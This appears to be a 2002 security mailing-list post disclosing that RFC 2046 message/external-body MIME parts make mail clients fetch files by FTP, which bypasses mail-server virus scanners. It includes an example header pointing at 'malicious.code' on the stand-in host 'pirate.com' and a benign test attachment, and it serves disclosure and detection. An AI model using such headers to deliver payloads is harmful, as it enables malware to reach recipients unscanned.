Hi,
Some days ago, we're talking about RFC 2046 message fragmentation
vulnerability.
There is another related RFC 2046 vulnerability : message/external-body
message type.
RFC 2046 message/external-body MIME type allows to send messages not by
it's content, but by reference.
In this case, you can send a message with the following MIME tag :
Content-Type: message/external-body; name="malicious.code";
site="pirate.com"; mode="image";
access-type=ANON-FTP; directory="pub"
Client MUA, receives this and will get "malicious.code" file by
anonymous ftp from pirate.com ftp server.
RFC 2046 defines five access-types :"FTP", "ANON-FTP", "TFTP",
"LOCAL-FILE", and "MAIL-SERVER".
There are some other optional parameters to this feature. For example,
if the message includes parameter permission="write", existing file will
be overwriten.
RFC 2046 says something about security in paragraph 5.2.3.6 :
> (1) Accessing data via a "message/external-body" reference
> effectively results in the message recipient performing
> an operation that was specified by the message
> originator. It is therefore possible for the message
> originator to trick a recipient into doing something
> they would not have done otherwise. ...
Combining different access-types (mainly anon-ftp, mail-server and
local-file) can create; IMHO, more complex attacks.
What's interesting is that in this case the message and the malicious
code passes through two different network paths : messages is sent by
mail and the malicious code will be get by receiver by anonymous ftp.
In the case of previous vulnerability (fragmented message), message and
malicious code uses the same network path.
Classical mail server virus scanners will never see the malicious code
pass through it, as they will never have available entire malicious
code.
The only way to detect it, IMHO, at mail server, is by lexical analysis
of MIME tags.
Netscape Communicator 4.79 is compatible with this RFC 2046 feature.
I can't say anything about others mail clients, as I'm sick at home and
I have no access to other MUAs.
Attached to this message you'll find a message sent using this feature
and allowing you to get RFC 2046 by anonymous ftp. Maybe someone can
check it out with Outlook and other popular MUAs. It's in the /var/mail
format : you can append it to your mailbox and try it... 8-)
References : RFC 2046 - MIME - Media Types
Jose Marcio
--
-------------------------------------------------------------------
Jose Marcio MARTINS DA CRUZ
Ecole Nationale Superieure des Mines de Paris
Centre de Calcul Tel . : 01.40.51.93.41
60, bd Saint Michel http://www.ensmp.fr/~martins
75272 - PARIS CEDEX 06 mailto:martins@cc.ensmp.fr
From martins@didi.ensmp.fr Wed Sep 18 10:40:02 2002
Return-Path: <martins@ensmp.fr>
Received: from didi.ensmp.fr (didi [10.5.5.101])
by ticrobe.ensmp.fr (8.12.4/8.12.2/JMMC) with ESMTP id g8I8dLCi003339
for <tijojo@adrian.ensmp.fr>; Wed, 18 Sep 2002 10:40:02 +0200
Sender: martins@paris.ensmp.fr
Message-ID: <3D88395A.AE13841F@didi.ensmp.fr>
Date: Wed, 18 Sep 2002 10:29:14 +0200
From: Jose Martins <martins@didi.ensmp.fr>
Reply-To: tijojo@paris.ensmp.fr
X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.18-3 i686)
X-Accept-Language: en
MIME-Version: 1.0
To: tijojo@adrian.ensmp.fr
Subject: tst attachment
Content-Type: multipart/mixed;
boundary="------------FA43411C8E35AC7F655DA077"
X-Miltered: at ticrobe by Joe's j-chkmail ("http://j-chkmail.ensmp.fr";)!
Status: RO
This is a multi-part message in MIME format.
--------------FA43411C8E35AC7F655DA077
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
RFC 2046 message/external-body compatibility test
--------------FA43411C8E35AC7F655DA077
Content-Type: message/external-body; name="rfc2046.Z";
site="ftp.inria.fr"; mode="image";
access-type=ANON-FTP; directory="rfc/rfc20xx"
--------------FA43411C8E35AC7F655DA077--
